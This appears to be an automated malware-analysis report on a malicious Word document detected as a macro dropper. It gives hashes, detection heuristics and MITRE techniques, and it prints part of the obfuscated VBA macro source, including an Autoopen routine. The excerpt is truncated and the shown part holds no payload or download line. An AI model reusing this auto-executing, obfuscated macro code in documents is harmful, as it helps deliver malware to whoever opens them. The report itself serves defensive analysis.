Office (OLE) malware analysis — malicious · 18e87fa0349a8412

MALICIOUS

Office (OLE)

172.5 KB Created: 2018-04-27 13:28:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 0d44ef83413013f363302dae793a7c96 SHA-1: af5ad94b91f4d3565bea8aae4477295aa262c499 SHA-256: 18e87fa0349a841292702fade67b2a2cf5b67f52f646ee12e09e4e34e38fc515

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6520688-0. Critical heuristics indicate the presence of VBA macros with a Shell() call, and a legacy AutoOpen marker. The VBA script, though heavily obfuscated, contains calls suggestive of executing external commands, which is a common technique for downloading and running further stages of malware.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6520688-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6520688-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54190 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	54190 bytes
SHA-256: `06371d1f77be79d8def50fdc3f39bb0f05820c7b453441e0ce538d5345d045f6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "RdQYzjkwruGrz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AzbzJT(awJKqG) Select Case FJfMr Case 97446 zWODGi = FHoAlA uftoin = Round(65794) VtUjS = Hex(BlwrAM - ChrW(cMtDk)) VqVJE = aKilY Case 24792 CbBVj = CByte(48418) mEWrJ = Log(opSSAl) End Select End Sub Sub ZNhzjP(siWzYi) Select Case JZbrJd Case 41159 QTdATQ = sMlnTl tBlUzX = Round(7505) XTfvfQ = Hex(aqHYww - ChrW(WjwLH)) KNlLDT = ZGpjzY Case 66519 KVXlUB = CByte(71755) fvpsjf = Log(XmQNX) End Select Select Case hUsLk Case 32463 BaaYO = LOYam ZTFPOa = Round(98710) ERthKL = Hex(dAiZkk - ChrW(tEUQi)) TnwMd = wqbEi Case 70591 WPjhsN = CByte(5552) iNuACE = Log(aBvzw) End Select Select Case aRShEm Case 25172 BwAowO = JXcDb lZELaU = Round(80163) aIjoA = Hex(wQzobp - ChrW(jQtLDq)) QdSuU = prOVd Case 34915 jaoUA = CByte(95874) CtXob = Log(BEILAX) End Select End Sub Sub izzplU(FGCiK) Select Case SCFcZ Case 22205 XFXFi = iwkjC Gophd = Round(96172) fzNvqt = Hex(STzzjm - ChrW(QHcbrL)) mBVXz = EVdVc Case 58968 fIJJjM = CByte(3486) OzlCQj = Log(jMFlmO) End Select Select Case vrYrkY Case 95622 iXBvII = TufJTX kUjcP = Round(77143) Pqrbl = Hex(Slpbd - ChrW(XVOBU)) hjtKG = vVtHDI Case 14443 JaOhJ = CByte(37850) viiFD = Log(RzjWTO) End Select End Sub Sub Autoopen() On Error Resume Next Select Case iEXFj Case 27257 QTLhhU = szHhr AmFLF = Round(4776) dWMlkt = Hex(aFDIz - ChrW(nGbTBY)) LYCZpb = EwzLA Case 63847 CtHZw = CByte(76641) tnuwj = Log(NtKlKh) End Select CtEiJlhrij (mFTmw + iPhOuWwc + jziGr) Select Case QfkMT Case 87906 kRSlI = FfzLlN TOiza = Round(39589) nHUOjC = Hex(TQdjrr - ChrW(wBTTL)) qdjmt = ppCAnm Case 98275 RcwEE = CByte(10629) mOWitV = Log(WMKiPI) End Select End Sub Sub JaiUnN(RQqtsb) Select Case UEPOFZ Case 8985 KHAXt = ppIXq HBOjQs = Round(72576) wjkBt = Hex(BIvPJ - ChrW(hvQaUQ)) jcahW = wjSpf Case 94868 ojQiW = CByte(97123) kRjusN = Log(vMloP) End Select Select Case YFsXz Case 27483 vcjSPS = uwilEV jOvjoI = Round(90537) ThBQw = Hex(iqsfIw - ChrW(IiOiaR)) zhzjt = oqzrK Case 11012 sIBQz = CByte(42012) MHmGv = Log(EbjhB) End Select Select Case qjFmi Case 34196 iAstA = Cupzj fELAqv = Round(86071) WKNKQq = Hex(PVnWTz - ChrW(nGTOlm)) cObzjW = fjPqp Case 56881 YmicKX = CByte(76014) BdNzC = Log(EjcJG) End Select End Sub Sub uvmKjU(jmYfiV) Select Case OTklbP Case 10649 MzlmT = aCnhii dAXwp = Round(67801) mdzjc = Hex(Clvqhr - ChrW(rjoYuB)) Ijlwvn = lSNol Case 61175 QjzCJ = CByte(86508) pGwzrs = Log(uMwBo) End Select End Sub Attribute VB_Name = "vCrznpCRSiCvL" Sub aAoWkI(SdpwE) Select Case JrGOmw Case 85894 NrAPU = XXYuDf nuXcR = Round(62947) cZCAju = Hex(aLUPwS - ChrW(NIoGQS)) vFvvYp = zjlVQ ... (truncated)

SHA-256: 06371d1f77be79d8def50fdc3f39bb0f05820c7b453441e0ce538d5345d045f6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "RdQYzjkwruGrz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AzbzJT(awJKqG)
Select Case FJfMr
         Case 97446
            zWODGi = FHoAlA
            uftoin = Round(65794)
            VtUjS = Hex(BlwrAM - ChrW(cMtDk))
            VqVJE = aKilY
         Case 24792
            CbBVj = CByte(48418)
            mEWrJ = Log(opSSAl)
End Select
End Sub
Sub ZNhzjP(siWzYi)
Select Case JZbrJd
         Case 41159
            QTdATQ = sMlnTl
            tBlUzX = Round(7505)
            XTfvfQ = Hex(aqHYww - ChrW(WjwLH))
            KNlLDT = ZGpjzY
         Case 66519
            KVXlUB = CByte(71755)
            fvpsjf = Log(XmQNX)
End Select
Select Case hUsLk
         Case 32463
            BaaYO = LOYam
            ZTFPOa = Round(98710)
            ERthKL = Hex(dAiZkk - ChrW(tEUQi))
            TnwMd = wqbEi
         Case 70591
            WPjhsN = CByte(5552)
            iNuACE = Log(aBvzw)
End Select
Select Case aRShEm
         Case 25172
            BwAowO = JXcDb
            lZELaU = Round(80163)
            aIjoA = Hex(wQzobp - ChrW(jQtLDq))
            QdSuU = prOVd
         Case 34915
            jaoUA = CByte(95874)
            CtXob = Log(BEILAX)
End Select
End Sub
Sub izzplU(FGCiK)
Select Case SCFcZ
         Case 22205
            XFXFi = iwkjC
            Gophd = Round(96172)
            fzNvqt = Hex(STzzjm - ChrW(QHcbrL))
            mBVXz = EVdVc
         Case 58968
            fIJJjM = CByte(3486)
            OzlCQj = Log(jMFlmO)
End Select
Select Case vrYrkY
         Case 95622
            iXBvII = TufJTX
            kUjcP = Round(77143)
            Pqrbl = Hex(Slpbd - ChrW(XVOBU))
            hjtKG = vVtHDI
         Case 14443
            JaOhJ = CByte(37850)
            viiFD = Log(RzjWTO)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case iEXFj
         Case 27257
            QTLhhU = szHhr
            AmFLF = Round(4776)
            dWMlkt = Hex(aFDIz - ChrW(nGbTBY))
            LYCZpb = EwzLA
         Case 63847
            CtHZw = CByte(76641)
            tnuwj = Log(NtKlKh)
End Select
CtEiJlhrij (mFTmw + iPhOuWwc + jziGr)
Select Case QfkMT
         Case 87906
            kRSlI = FfzLlN
            TOiza = Round(39589)
            nHUOjC = Hex(TQdjrr - ChrW(wBTTL))
            qdjmt = ppCAnm
         Case 98275
            RcwEE = CByte(10629)
            mOWitV = Log(WMKiPI)
End Select
End Sub
Sub JaiUnN(RQqtsb)
Select Case UEPOFZ
         Case 8985
            KHAXt = ppIXq
            HBOjQs = Round(72576)
            wjkBt = Hex(BIvPJ - ChrW(hvQaUQ))
            jcahW = wjSpf
         Case 94868
            ojQiW = CByte(97123)
            kRjusN = Log(vMloP)
End Select
Select Case YFsXz
         Case 27483
            vcjSPS = uwilEV
            jOvjoI = Round(90537)
            ThBQw = Hex(iqsfIw - ChrW(IiOiaR))
            zhzjt = oqzrK
         Case 11012
            sIBQz = CByte(42012)
            MHmGv = Log(EbjhB)
End Select
Select Case qjFmi
         Case 34196
            iAstA = Cupzj
            fELAqv = Round(86071)
            WKNKQq = Hex(PVnWTz - ChrW(nGTOlm))
            cObzjW = fjPqp
         Case 56881
            YmicKX = CByte(76014)
            BdNzC = Log(EjcJG)
End Select
End Sub
Sub uvmKjU(jmYfiV)
Select Case OTklbP
         Case 10649
            MzlmT = aCnhii
            dAXwp = Round(67801)
            mdzjc = Hex(Clvqhr - ChrW(rjoYuB))
            Ijlwvn = lSNol
         Case 61175
            QjzCJ = CByte(86508)
            pGwzrs = Log(uMwBo)
End Select
End Sub

Attribute VB_Name = "vCrznpCRSiCvL"
Sub aAoWkI(SdpwE)
Select Case JrGOmw
         Case 85894
            NrAPU = XXYuDf
            nuXcR = Round(62947)
            cZCAju = Hex(aLUPwS - ChrW(NIoGQS))
            vFvvYp = zjlVQ
   
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.